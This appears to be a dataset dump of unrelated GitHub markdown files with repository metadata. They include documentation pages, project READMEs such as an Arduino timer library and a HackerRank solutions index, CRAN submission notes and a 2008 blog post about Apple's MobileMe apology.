ms.topic: conceptual
ms.assetid: 1568ed6a-022c-4839-b73e-4eb49558bbc2
author: douglaslMS
ms.author: douglasl
manager: craigg
ms.openlocfilehash: 51ca2217d9d04cb6d38c493e2199a065720f8c17
ms.sourcegitcommit: 61381ef939415fe019285def9450d7583df1fed0
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 10/01/2018
ms.locfileid: "47626053"
---
# <a name="recordset-destination-custom-properties"></a>Propiedades personalizadas del destino de conjunto de registros
El destino Conjunto de registros tiene propiedades personalizadas y propiedades comunes a todos los componentes de flujo de datos.
En la tabla siguiente se describen las propiedades personalizadas del destino Conjunto de registros. Todas las propiedades son de lectura y escritura.
|Nombre de propiedad|Tipo de datos|Descripción|
|-------------------|---------------|-----------------|
|VariableName|String|Nombre de la variable que contiene el conjunto de registros ADO.|
La entrada y las columnas de entrada de destino de conjunto de registros no tienen ninguna propiedad personalizada.
Para más información, consulte [Recordset Destination](../../integration-services/data-flow/recordset-destination.md).
## <a name="see-also"></a>Ver también
[Common Properties](http://msdn.microsoft.com/library/51973502-5cc6-4125-9fce-e60fa1b7b796)
| 41.631579 | 153 | 0.764855 | spa_Latn | 0.910822 |
97482f4d4f8733168601718927ad7bcc0eabe632 | 57 | md | Markdown | README.md | PatricksPessoa/javascript-training | 47d8fd03d526bb1cd49e3c458794abc8d130f835 | [
"MIT"
] | 1 | 2020-07-25T13:57:49.000Z | 2020-07-25T13:57:49.000Z | README.md | PatricksPessoa/javascript-training | 47d8fd03d526bb1cd49e3c458794abc8d130f835 | [
"MIT"
] | null | null | null | README.md | PatricksPessoa/javascript-training | 47d8fd03d526bb1cd49e3c458794abc8d130f835 | [
"MIT"
] | null | null | null | # javascript-training
Just training the firsts concepts
| 14.25 | 33 | 0.824561 | eng_Latn | 0.995952 |
9748f2c3ce1cdcc2c54edf32842d807088666253 | 4,167 | md | Markdown | README.md | XavierBrochard/HackerRank-solutions | c1f65071114f04cf1a7ae453cfff0560d6d4e5a1 | [
"MIT"
] | null | null | null | README.md | XavierBrochard/HackerRank-solutions | c1f65071114f04cf1a7ae453cfff0560d6d4e5a1 | [
"MIT"
] | null | null | null | README.md | XavierBrochard/HackerRank-solutions | c1f65071114f04cf1a7ae453cfff0560d6d4e5a1 | [
"MIT"
] | null | null | null | <p align="center">
<a href="https://www.hackerrank.com/RodneyShag">
<img height=85 src="https://d3keuzeb2crhkn.cloudfront.net/hackerrank/assets/styleguide/logo_wordmark-f5c5eb61ab0a154c3ed9eda24d0b9e31.svg">
</a>
<br>My solutions to HackerRank problems
</p>
# Algorithms
|Category|Challenge|Difficulty|Score|Solution|
|:---:|:---:|:---:|:---:|:---:|
| Strings | [Sherlock and Anagrams](https://www.hackerrank.com/challenges/sherlock-and-anagrams/problem)| Medium | 50 | [Solution.js](Algorithms/Strings/SherlockAndAnagrams/Solution.js) |
| Strings | [Two Strings](https://www.hackerrank.com/challenges/two-strings/problem)| Easy | 25 | [Solution.js](Algorithms/Strings/TwoStrings/Solution.js) |
| Implementation | [Sales by Match](https://www.hackerrank.com/challenges/sock-merchant/problem)| Easy | 10 | [Solution.js](Algorithms/Implementation/SalesbyMatch/Solution.js) |
| Implementation | [Counting Valleys](https://www.hackerrank.com/challenges/counting-valleys/problem)| Easy | 15 | [Solution.js](Algorithms/Implementation/CountingValleys/Solution.js) |
| Implementation | [Jumping on the Clouds](https://www.hackerrank.com/challenges/jumping-on-the-clouds/problem)| Easy | 20 | [Solution.js](Algorithms/Implementation/JumpingOnTheClouds/Solution.js) |
| Implementation | [Repeated String](https://www.hackerrank.com/challenges/repeated-string/problem)| Easy | 20 | [Solution.js](Algorithms/Implementation/RepeatedString/Solution.js) |
# Data Structures
|Category|Challenge|Difficulty|Score|Solution|
|:---:|:---:|:---:|:---:|:---:|
| Arrays | [Array Manipulation](https://www.hackerrank.com/challenges/crush/problem)| Hard | 24/60 | [Solution.js](DataStructures/Arrays/ArrayManipulation/Solution.js) |
| Arrays | [Sparse Arrays](https://www.hackerrank.com/challenges/sparse-arrays/problem)| Medium | 25 | [Solution.js](DataStructures/Arrays/SparseArrays/Solution.js) |
| Trees | [Tree: Preorder Traversal](https://www.hackerrank.com/challenges/tree-preorder-traversal/problem)| Easy | 10 | [Solution.java](DataStructures/Trees/Tree:PreorderTraversal/Solution.java) |
| Trees | [Tree: Postorder Traversal](https://www.hackerrank.com/challenges/tree-postorder-traversal/problem)| Easy | 10 | [Solution.java](DataStructures/Trees/Tree:PostorderTraversal/Solution.java) |
| Trees | [Tree: Inorder Traversal](https://www.hackerrank.com/challenges/tree-inorder-traversal/problem)| Easy | 10 | [Solution.java](DataStructures/Trees/Tree:InorderTraversal/Solution.java) |
| Trees | [Tree: Height of a Binary Tree](https://www.hackerrank.com/challenges/tree-height-of-a-binary-tree/problem)| Easy | 10 | [Solution.java](DataStructures/Trees/Tree:HeightOfABinaryTree/Solution.java) |
# Interview Prepartion Kit
|Category|Challenge|Difficulty|Score|Solution|
|:---:|:---:|:---:|:---:|:---:|
| Arrays | [Minimum Swaps 2](https://www.hackerrank.com/challenges/minimum-swaps-2/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=arrays)| Medium | 40 | [Solution.js](InterviewPreparationKit/MinimumSwaps2/Solution.js) |
| Arrays | [New Year Chaos](https://www.hackerrank.com/challenges/new-year-chaos/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=arrays)| Medium | 40 | [Solution.js](InterviewPreparationKit/NewYearChaos/Solution.js) |
| Arrays | [2D Array - DS](https://www.hackerrank.com/challenges/2d-array/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=arrays)| Easy | 15 | [Solution.js](InterviewPreparationKit/2DArray-DS/Solution.js) |
| Arrays | [Arrays: Left Rotation](https://www.hackerrank.com/challenges/ctci-array-left-rotation/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=arrays)| Easy | 20 | [Solution.js](InterviewPreparationKit/Arrays:LeftRotation/Solution.js) |
# Tutorials
|Category|Challenge|Difficulty|Score|Solution|
|:---:|:---:|:---:|:---:|:---:|
| Cracking the Coding Interview | [Hash Tables: Ransom Note](https://www.hackerrank.com/challenges/ctci-ransom-note/problem)| Easy | 25 | [Solution.js](CrackingTheCodingInterview/HashTables:RansomNote/Solution.js) | 106.846154 | 281 | 0.759299 | yue_Hant | 0.461397 |
9748f7dbc260ac4d114ea547a4bce7a20332d75a | 259 | md | Markdown | samples/compile/README.md | pipeos-one/evmasm | 9337789f108ba2a8d2f41fc683a05b6befc3f85e | [
"MIT"
] | 2 | 2018-08-20T00:17:18.000Z | 2020-05-21T02:25:23.000Z | samples/compile/README.md | pipeos-one/evmasm | 9337789f108ba2a8d2f41fc683a05b6befc3f85e | [
"MIT"
] | 1 | 2020-10-02T22:34:54.000Z | 2020-10-02T22:34:54.000Z | samples/compile/README.md | pipeos-one/evmasm | 9337789f108ba2a8d2f41fc683a05b6befc3f85e | [
"MIT"
] | 1 | 2020-08-16T09:34:07.000Z | 2020-08-16T09:34:07.000Z | # Compile sample
Execute
```
node compile counter.asm
```
The output is the compile bytecodes.
The original source code is in file `counter.sol`. The `.asm` was generated
using `solc --asm` and commenting out the line starting with `==...`.
| 18.5 | 76 | 0.675676 | eng_Latn | 0.999143 |
97490ce16508c91ada00f65391871ccb36c67bd3 | 3,137 | md | Markdown | cran-comments.md | Hegghammer/daiR | 99587cd1b7fec4692aaba305c1951f8c7685bcec | [
"MIT"
] | 28 | 2021-03-04T18:38:22.000Z | 2022-01-02T11:35:47.000Z | cran-comments.md | Hegghammer/daiR | 99587cd1b7fec4692aaba305c1951f8c7685bcec | [
"MIT"
] | 5 | 2021-04-19T19:45:37.000Z | 2022-01-18T12:59:17.000Z | cran-comments.md | Hegghammer/daiR | 99587cd1b7fec4692aaba305c1951f8c7685bcec | [
"MIT"
] | 4 | 2021-03-15T07:06:53.000Z | 2021-12-21T18:27:16.000Z | ## Resubmission
This is a resubmission. In this version I have addressed Gregor Seyers comments. I have:
* put 'daiR' in single quotes throughout, except in the top line of the DESCRIPTION
file, as `devtools::check(cran=TRUE)` throws an error if I do.
* put 'Document AI' in single quotes throughout in the DESCRIPTION file.
* added a web reference for the API in the DESCRIPTION file.
* added `\value` to all .Rd files that didn't have it and reviewed all `\value`
entries to make sure they communicate the structure/class and meaning of the output,
including in the places where no value is returned.
* removed all instances I could find of functions writing to the user's homespace.
I checked all the examples, tests, vignettes, as well as readme.md and changed to tempdir()
throughout.
* removed the function that wrote to the global environment. I should mention that
the function --- which creates an `.auth` object on load to store access tokens ---
was borrowed from a set of large R packages currently on CRAN, notably
['bigRQuery'](https://github.com/r-dbi/bigrquery/blob/main/R/zzz.R) and
['googledrive'](https://github.com/tidyverse/googledrive/blob/master/R/zzz.R).
This led me to believe that CRAN makes exceptions for credential-storing functions.
My new authentication solution works, but in case it breaks, it would be useful to know
whether CRAN does indeed allow this particular operation. (I'm assuming the
maintainers of the other packages use it for good reason.)
I also made some additional changes. I have:
* removed two functions (`dai_has_token()` and `dai_deauth`) that are redundant under
the new authentication solution.
* removed one function (`create_folder()`) that I found on closer inspection to be
unnecessary.
* rewritten several function descriptions (in the .Rd files) for improved clarity
and consistency.
* revised news.md and the vignettes to reflect the above changes.
* changed the new version number to 0.9.0 in view of the scale of the combined changes.
## Test environments
* local Win 10 Enterprise install, R 4.1.0
* windows 10.0.17763 (on Github actions), R 4.1.0
* ubuntu 20.04 (on Github actions), R 4.1.0
* mac OS 10.15 (on Github actions), R 4.1.0
* windows (on WinBuilder), R Devel
* fedora 24 (on rhub), R Devel
## R CMD check results
There were no ERRORs or WARNINGs.
There was 1 NOTE on rhub and WinBuilder:
* New submission
## Downstream dependencies
I am not aware of any downstream dependencies.
################################################
## Package history
This is a first submission.
## Test environments
* local Win 10 Enterprise install, R 4.1.0
* windows 10.0.17763 (on Github actions), R 4.1.0
* ubuntu 20.04 (on Github actions), R 4.1.0
* mac OS 10.15 (on Github actions), R 4.1.0
* windows (on WinBuilder), R Devel
* fedora 24 (on rhub), R Devel
## R CMD check results
There were no ERRORs or WARNINGs.
There was 1 NOTE on rhub and WinBuilder:
* Possibly mis-spelled words in DESCRIPTION:
JSON (14:39)
daiR (13:15, 14:77)
These are proper names.
## Downstream dependencies
I am not aware of any downstream dependencies.
| 39.2125 | 91 | 0.739241 | eng_Latn | 0.993768 |
9749437f493e7b159d059505d7ca352d9f1e940a | 5,354 | markdown | Markdown | _posts/2008-07-17-apple-owns-up-on-mobile-me-debacle.markdown | bobbidigital/bobbidigital.github.io | 0abf9456b53aec087c0cac8d186514930916bbe9 | [
"MIT"
] | null | null | null | _posts/2008-07-17-apple-owns-up-on-mobile-me-debacle.markdown | bobbidigital/bobbidigital.github.io | 0abf9456b53aec087c0cac8d186514930916bbe9 | [
"MIT"
] | null | null | null | _posts/2008-07-17-apple-owns-up-on-mobile-me-debacle.markdown | bobbidigital/bobbidigital.github.io | 0abf9456b53aec087c0cac8d186514930916bbe9 | [
"MIT"
] | null | null | null | ---
layout: post
status: publish
published: true
title: Apple Owns Up on Mobile Me Debacle
author: Jeff
author_login: admin
author_email: [email protected]
author_url: http://www.allthingsdork.com
wordpress_id: 393
wordpress_url: http://www.allthingsdork.com/?p=393
date: '2008-07-17 15:02:11 -0500'
date_gmt: '2008-07-17 19:02:11 -0500'
categories:
- Random
tags:
- Apple
- mobile me
comments: []
---
<p>I received a rather uncharacteristic e-mail from Apple the other day. For those that don't know their migration to <em>Mobile Me</em> wasn't without it's fair share of problems. Unlike the iPhone debacles though, Apple has nobody to blame but themselves on this one. But instead of covering it up in a shroud of secrecy, we got this attempt at an explanation. Could this be the first sign of a softer, more communicative Apple? I doubt it, but one can hope.</p>
<p>If there is anything that's been a staple in my time as an Apple customer is that they're arrogant. That type of behavior clearly flows from the top down. Funny how AT&T is to blame for the activation issues, yet every iPhone carrier in the world has had similar issues. The only common denominator is Apple.</p>
<p>That being said, it makes a letter such as this a big deal. Read below for, what I can only hope to be, the new Apple. Also take note of the free extension and their admittance to screwing the pooch on the word "push".</p>
<blockquote>
<div style="padding: 2px 18px 0px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #5c5e5f; font-size: 12px; line-height: 1.34em;">We have recently completed the transition from .Mac to MobileMe. Unfortunately, it was a lot rockier than we had hoped.</div></p>
<div style="padding: 12px 18px 0px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #5c5e5f; font-size: 12px; line-height: 1.34em;">Although core services such as Mail, iDisk, Sync, Back to My Mac, and Gallery went relatively smoothly, the new MobileMe web applications had lots of problems initially. Fortunately we have worked through those problems and the web apps are now up and running.</div></p>
<div style="padding: 12px 18px 0px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #5c5e5f; font-size: 12px; line-height: 1.34em;">Another snag we have run into is our use of the word "push" in describing everything under the MobileMe umbrella. While all email, contact or calendar changes on the iPhone and the web apps are immediately synced to and from the MobileMe "cloud," changes made on a PC or Mac take up to 15 minutes to sync with the cloud and your other devices. So even though things are indeed instantly pushed to and from your iPhone and the web apps today, we are going to stop using the word "push" until it is near-instant on PCs and Macs, too.</div></p>
<div style="padding: 12px 18px 0px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #5c5e5f; font-size: 12px; line-height: 1.34em;">We want to apologize to our loyal customers and express our appreciation for their patience by giving all current subscribers an automatic <a style="color: #007cba; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; font-size: 12px; line-height: 1.34em; text-decoration: underline;" href="http://insideapple.apple.com/redir/cbx-cgi.do?v=2&a=lZFsStSEruEB%2BrEySuHgdtGLfE68XLHNq4VQN4cX4iWgYwDOqO%2F2dYnlZhxDbD72IgrFvQKzHrdMyxhfoEp6j4Mdta5zgMhhTnli3b3U0ijyyM8J635dNa2zage%2BLzdH" target="_blank">30-day extension</a> to their MobileMe subscription free of charge. Your extension will be reflected in your account settings within the next few weeks.</div></p>
<div style="padding: 12px 18px 0px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #5c5e5f; font-size: 12px; line-height: 1.34em;">We hope you enjoy your new suite of web applications at <a id="dontlinkme_E4F0DE30_011B_1000_8BA7_63CA6BAEFF9C_16" style="font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #5c5e5f; font-size: 12px; line-height: 1.34em; text-decoration: none;" name="dontlinkme">me.com</a>, in addition to keeping your iPhone and iPod touch wirelessly in sync with these new web applications and your Mac or PC.</div></p>
<div style="padding: 12px 18px 0px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #5c5e5f; font-size: 12px; line-height: 1.34em;">Thank you,</div></p>
<div style="padding: 12px 18px 0px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #000000; font-size: 12px; line-height: 1.34em; font-weight: bold;">The MobileMe Team</div></p>
<div style="padding: 22px 40px 4px 18px; font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #7c7c7c; font-size: 9px; line-height: 1.33em;">Please review the MobileMe <a style="font-family: Lucida Grande,Arial,Helvetica,Geneva,Verdana,sans-serif; color: #7c7c7c; font-size: 9px; line-height: 1.33em; text-decoration: underline;" href="http://insideapple.apple.com/redir/cbx-cgi.do?v=2&a=lZFsStSEruEB%2BrEySuHgdti0Yqef55S9H1i0uAdvIanuFlNoQkfBykY1ROWw2HvsQ2FQ6BjqjyrzoILWl0CsvAsYztNtycRaf%2BgJ4eXxjYZAE5nLafXT5TLEcph2kw76" target="_blank">Terms of Service</a>.*</div></blockquote></p>
| 162.242424 | 839 | 0.777363 | eng_Latn | 0.935596 |
974a11077b797d6e3a5f61975a4be3e34cf1ca2a | 848 | md | Markdown | README.md | drewf7/website | dea6b5ac3ef6f3eec682d4f236a44757c6d472f4 | [
"Apache-2.0"
] | 1 | 2021-07-18T04:17:33.000Z | 2021-07-18T04:17:33.000Z | README.md | drewf7/website | dea6b5ac3ef6f3eec682d4f236a44757c6d472f4 | [
"Apache-2.0"
] | null | null | null | README.md | drewf7/website | dea6b5ac3ef6f3eec682d4f236a44757c6d472f4 | [
"Apache-2.0"
] | null | null | null | # Navidrome Website

## Setting up local environment
```bash
git clone --recurse-submodules https://github.com/navidrome/website.git
cd website
npm install
```
You'll need to install [Hugo](https://gohugo.io/) 0.66.0 or newer
## Running the website locally
Once you've setup your local environment as above, from the repo's root folder run:
```
hugo server
```
This will start Hugo and serve the site at http://localhost:1313
## Credits
Photos from Unsplash by:
* [Travis Yewell](https://unsplash.com/@shutters_guild?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)
* [Florencia Viadana](https://unsplash.com/@florenciaviadana?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText")
| 28.266667 | 137 | 0.773585 | yue_Hant | 0.310856 |
974a1cbdfb8cde82b6f65fbb24de6655aabed1e8 | 1,000 | md | Markdown | README.md | BioArtBot/hardware_adapters | ed33217fa6c39ec52c8998f92290b46facdc32d2 | [
"IJG"
] | 2 | 2022-02-24T21:33:14.000Z | 2022-02-28T16:56:28.000Z | README.md | BioArtBot/hardware_adapters | ed33217fa6c39ec52c8998f92290b46facdc32d2 | [
"IJG"
] | null | null | null | README.md | BioArtBot/hardware_adapters | ed33217fa6c39ec52c8998f92290b46facdc32d2 | [
"IJG"
] | null | null | null | # Hardware Adapters
This repo contains design files and further instructions for assembling 3D printed hardware that adapters to lab automation equipment. Originally forked from [iGEM Marburg's excellent 2019 project](https://github.com/BioArtBot/iGemMarburg2019), this includes hardware for their Colony Picking and Promega Plasmid Purification Protocols, as well as additional labware by them and others.
## License
Files ending in "_iGEM" are copyright iGEM Marburg 2019.<br/>
Other files are copyright BioArtBot Working Group 2020-2022.<br/>
These STL and instruction PDF files describing our hardware are licensed under the
CERN OHL v. 1.2.<br/>
You may redistribute and modify these STL and instrcution PDF files under the terms of the
CERN OHL v.1.2. (http://ohwr.org/cernohl). These files are distributed
WITHOUT ANY EXPRESS OR IMPLIED WARRANTY, INCLUDING OF
MERCHANTABILITY, SATISFACTORY QUALITY AND FITNESS FOR A
PARTICULAR PURPOSE. Please see the CERN OHL v.1.2 for applicable
conditions
| 66.666667 | 386 | 0.811 | eng_Latn | 0.91596 |
974ba6888e9062ecfab0d6f6471f4b428553b4be | 992 | md | Markdown | README.md | isabella232/discourse-automation | e96198960af9c103a1002c4cc9370ba0934d2faf | [
"MIT"
] | null | null | null | README.md | isabella232/discourse-automation | e96198960af9c103a1002c4cc9370ba0934d2faf | [
"MIT"
] | 1 | 2021-02-23T21:50:39.000Z | 2021-02-23T21:50:39.000Z | README.md | isabella232/discourse-automation | e96198960af9c103a1002c4cc9370ba0934d2faf | [
"MIT"
] | null | null | null | <h3 align="center">
<a href="https://github.com/jjaffeux/discourse-automation/blob/master/public/images/discourse-automation.png">
<img src="https://github.com/jjaffeux/discourse-automation/blob/master/public/images/discourse-automation.png?raw=true" alt="discourse automation Logo" width="200">
</a>
</h3>
# discourse-automation
discourse-automation is a plugin for to let you automate actions on your discourse Forum
## Installation
Follow [Install a Plugin](https://meta.discourse.org/t/install-a-plugin/19157)
how-to from the official Discourse Meta, using `git clone https://github.com/jjaffeux/discourse-automation.git`
as the plugin command.
## Usage
```ruby
Triggers.add(:on_cake_day) do
placeholder(:target_username, 'target_username')
provided([:target_username])
field(:group, component: :group)
end
```
### Actions
## Feedback
If you have issues or suggestions for the plugin, please bring them up on
[Discourse Meta](https://meta.discourse.org).
```
```
| 25.435897 | 166 | 0.75 | eng_Latn | 0.415065 |
974bfe1571b031be546ca5be97d3d4aaf64a98fb | 5,646 | md | Markdown | README.md | gfyrag/wiring-timer | 891a8cf2e4137fe6ccaaeb679e009a2f1a61dc61 | [
"MIT"
] | null | null | null | README.md | gfyrag/wiring-timer | 891a8cf2e4137fe6ccaaeb679e009a2f1a61dc61 | [
"MIT"
] | null | null | null | README.md | gfyrag/wiring-timer | 891a8cf2e4137fe6ccaaeb679e009a2f1a61dc61 | [
"MIT"
] | null | null | null | wiring-timer
===================
Universal Timer based on Arduino millis() function, supporting OOP principles and interoperating with Arduino yield() and delay() functions.
# Features
* configurable to be either recurring (timer automatically restarts after the interval) or non-recurring (timer stops after timeout period is over)
* timer interval/timeout time configurable
* attaches automatically to Timer Context which periodically updates all registered timers' states and performs the timer expire evaluation for each registered timer
* based on Arduino millis() function (number of milliseconds since the Arduino board began running the current program), handles unsigned long int overflows correctly
* implements Arduino yield() function in order to keep the timers' scheduling ongoing even while applications and drivers use the Arduino delay() function (Note: this is not supported when running on ESP8266 cores)
# Integration
Here the integration of a Timer is hown with a simple Arduino Sketch toggling the Arduino board's built-in LED (blink):
* Include the library
#include <Timer.h>
* Timer interval constant definition
const unsigned int BLINK_TIME_MILLIS = 200;
* specific `TimerAdapter` implementation, periodically toggling the Arduino built-in LED
class BlinkTimerAdapter : public TimerAdapter
{
public:
void timeExpired()
{
digitalWrite(LED_BUILTIN, !digitalRead(LED_BUILTIN));
}
};
* Setup: set LED pin to output; create recurring Timer, inject specific TimerAdapter
//The setup function is called once at startup of the sketch
void setup()
{
pinMode(LED_BUILTIN, OUTPUT);
new Timer(new BlinkTimerAdapter(), Timer::IS_RECURRING, BLINK_TIME_MILLIS);
}
* Loop: call `yield()`, the Arduino scheduler function
// The loop function is called in an endless loop
void loop()
{
yield();
}
* Loop: or alternatively call Arduino `delay()` function
// The loop function is called in an endless loop
void loop()
{
delay(10);
}
* ESP8266 Loop: call `scheduleTimers()` function
// The loop function is called in an endless loop
void loop()
{
scheduleTimers();
}
# API
This section describes the Timer library Application Programming Interface.
## Timer
* *Constructor*: `Timer(TimerAdapter* adapter = 0, bool isRecurring = false, unsigned long timeMillis = 0)`
Will attach itself to the `TimerContext` (which normally keeps being hidden to the application).
* Parameter `adapter`: `TimerAdapter` to be injected, is able to emit a timer expired event to any specific listener, default: 0 (no event will be sent)
* Parameter `isRecurring`: Operation mode, true: recurring, false: non-recurring, default: false
* Parameter `timeMillis`: Timer interval/timeout time [ms], >0: timer starts automatically after creation, others: timer remains stopped after creation, default: 0
* *Attach specific TimerAdapter*, acts as dependency injection. `void attachAdapter(TimerAdapter* adapter)`
* Parameter `adapter`: Specific `TimerAdapter` implementation
* *Timer Adapter get accessor* method. `TimerAdapter* adapter()`
* Returns `TimerAdapter`: Object pointer or 0 if no adapter is attached.
* *Start or restart the timer* with a specific time out or interval time. `void startTimer(unsigned long timeMillis)`
* Parameter `timeMillis`: Time out or interval time to be set for the timer [ms]; 0 will cancel the timer.
* *Start or restart the timer*. `void startTimer()`
* If the timer has been canceled before, this will have no effect - in order to start the timer again, the `startTimer(timeMillis)` method with specific time value parameter has to be used instead.
* *Cancel the timer and stop*. `void cancelTimer()`
* No time expired event will be sent out after the specified time would have been elapsed.
* Subsequent `isTimerExpired()` queries will return false.
* Poll method to *get the timer expire status*, recalculates whether the timer has expired before. `bool isTimerExpired()`
* This method could be used in a pure polling mode, where `tick()` has not to get called (by the `TimerContext::handleTick()` method), but also a mixed operation in combination with calling `tick()` periodically is possible.
* Subsequent `isTimerExpired()` queries will return false after the first one returned true, as long as the time did not expire again in case of a recurring timer.
* Returns `true` if the timer has expired.
* Indicates whether the timer is currently *running*. `bool isRunning()`
* Returns `true` if timer is running.
* Kick the Timer. `void tick()`
* Recalculates whether the timer has expired.
* Constant for `isRecurring` parameter of the constructor to create a one shot timer.
`static const bool IS_NON_RECURRING = false`
* Constant for `isRecurring` parameter of the constructor to create a recurring timer.
`static const bool IS_RECURRING = true`
## TimerAdapter
* Adapter Interface, will notify `timeExpired()` event.
* Implementations derived from this interface can be injected into a Timer object.
* The Timer then will call out the specific adapter's timeExpired() method.
Interface sending out a `timerExpired()` event.
* *Time expired event*. To be implemented by specific Timer Adapter class. `virtual void timeExpired() = 0`
## Notes
This repository is a renamed clone of https://github.com/dniklaus/arduino-utils-timer (Release 2.3.0).
For more details, please refer to the wiki: https://github.com/dniklaus/arduino-utils-timer/wiki/Timer
| 47.05 | 226 | 0.737513 | eng_Latn | 0.986621 |
974c94b7553aa0b773aaa64a1419d58b12d9ddce | 1,126 | md | Markdown | docs/visio/pathlength-function.md | changeworld/office-developer-client-docs.zh-CN | 5e055d0fba386d6ecb7e612c8e925e2a1bff85a0 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/visio/pathlength-function.md | changeworld/office-developer-client-docs.zh-CN | 5e055d0fba386d6ecb7e612c8e925e2a1bff85a0 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/visio/pathlength-function.md | changeworld/office-developer-client-docs.zh-CN | 5e055d0fba386d6ecb7e612c8e925e2a1bff85a0 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: PATHLENGTH 函数
manager: soliver
ms.date: 03/09/2015
ms.audience: Developer
ms.topic: reference
localization_priority: Normal
ms.assetid: 6f47ea08-fb5e-7d48-e84a-2a6570564924
description: 返回在指定 Geometry 节中定义的路径的长度。
ms.openlocfilehash: 37cabbde9fc0782bc1fde46f3065d0c945c9dada
ms.sourcegitcommit: 9d60cd82b5413446e5bc8ace2cd689f683fb41a7
ms.translationtype: MT
ms.contentlocale: zh-CN
ms.lasthandoff: 06/11/2018
ms.locfileid: "19780850"
---
# <a name="pathlength-function"></a>PATHLENGTH 函数
返回在指定 Geometry 节中定义的路径的长度。
## <a name="version-information"></a>版本信息
添加的版本: Visio 2010
## <a name="syntax"></a>语法
PATHLENGTH (* **部分** * * * *[、 段]* * *)
### <a name="parameters"></a>参数
|**名称**|**必需/可选**|**数据类型**|**说明**|
|:-----|:-----|:-----|:-----|
| _section_ <br/> |必需 <br/> |**字符串** <br/> |Geometry 节代表路径,通过对其 Path 单元格的引用指定(例如 Geometry1.Path)。 <br/> |
| _段_ <br/> |可选 <br/> |**Integer** <br/> |要度量的路径段(从 1 开始)。 <br/> |
### <a name="return-value"></a>返回值
**Double**
## <a name="remarks"></a>注解
如果_section_或_segment_不存在,Microsoft Visio 将返回 #REF !。
如果包含_segment_值,则 PATHLENGTH 返回仅段的长度。
| 23.458333 | 107 | 0.662522 | yue_Hant | 0.446402 |
b7cdf2dc4f3c5d2b171398a21b4be6c7c305bbd2 | 1,907 | md | Markdown | README.md | Inxton/template.essentials | c9170fc2378daf5ac26f9475e22c519e60c4d200 | [
"MIT"
] | 1 | 2021-12-17T09:13:38.000Z | 2021-12-17T09:13:38.000Z | README.md | Inxton/template.essentials | c9170fc2378daf5ac26f9475e22c519e60c4d200 | [
"MIT"
] | 9 | 2020-07-07T07:50:17.000Z | 2021-04-30T08:37:30.000Z | README.md | Inxton/template.essentials | c9170fc2378daf5ac26f9475e22c519e60c4d200 | [
"MIT"
] | null | null | null | 
# Inxton.Essentials - Template
Clone this repository or [download zip](https://github.com/Inxton/template.essentials/archive/master.zip) to build something amazing with INXTON.
## Check the prerequisites
Make sure you have everything you need to start using examples in this repository [here](https://github.com/Inxton/documentation/blob/master/PREREQUISITES.MD).
### Update packages
You may encounter this error message
```
The Vortex Builder does not exists
=============== Build cancelled ===============
```
To fix this issue go to Package manager console and type `Update-Package -Reinstall`


## What to do next?
Checkout [documentation](https://github.com/Inxton/documentation).
Checkout examples
* [Examples-Inxton.Package.Vortex.Core](https://github.com/Inxton/Examples-Inxton.Package.Vortex.Core)
* [Examples-Inxton.Package.Vortex.Essentials](https://github.com/Inxton/Examples-Inxton.Package.Vortex.Essentials)
# Need help?
🧪 Create an issue [here](https://github.com/Inxton/Feedback/issues/new/choose)
📫 We use mail too [email protected]
🐤 Contact us on Twitter [@Inxton](https://twitter.com/inxtonteam)
📽 Check out our [YouTube](https://www.youtube.com/channel/UCB3EcnWyLSsV5gqSt8PRDXA/featured)
🌐 For more info check out our website [INXTON.com](https://www.inxton.com/)
# Contributing
We are more than happy to hear your feedback, ideas!
Just submit it [here](https://github.com/Inxton/Feedback/issues/new/choose)
---
Developed with ❤ at [MTS](https://www.mts.sk/en) - putting the heart into manufacturing.
| 35.314815 | 159 | 0.7656 | eng_Latn | 0.364359 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.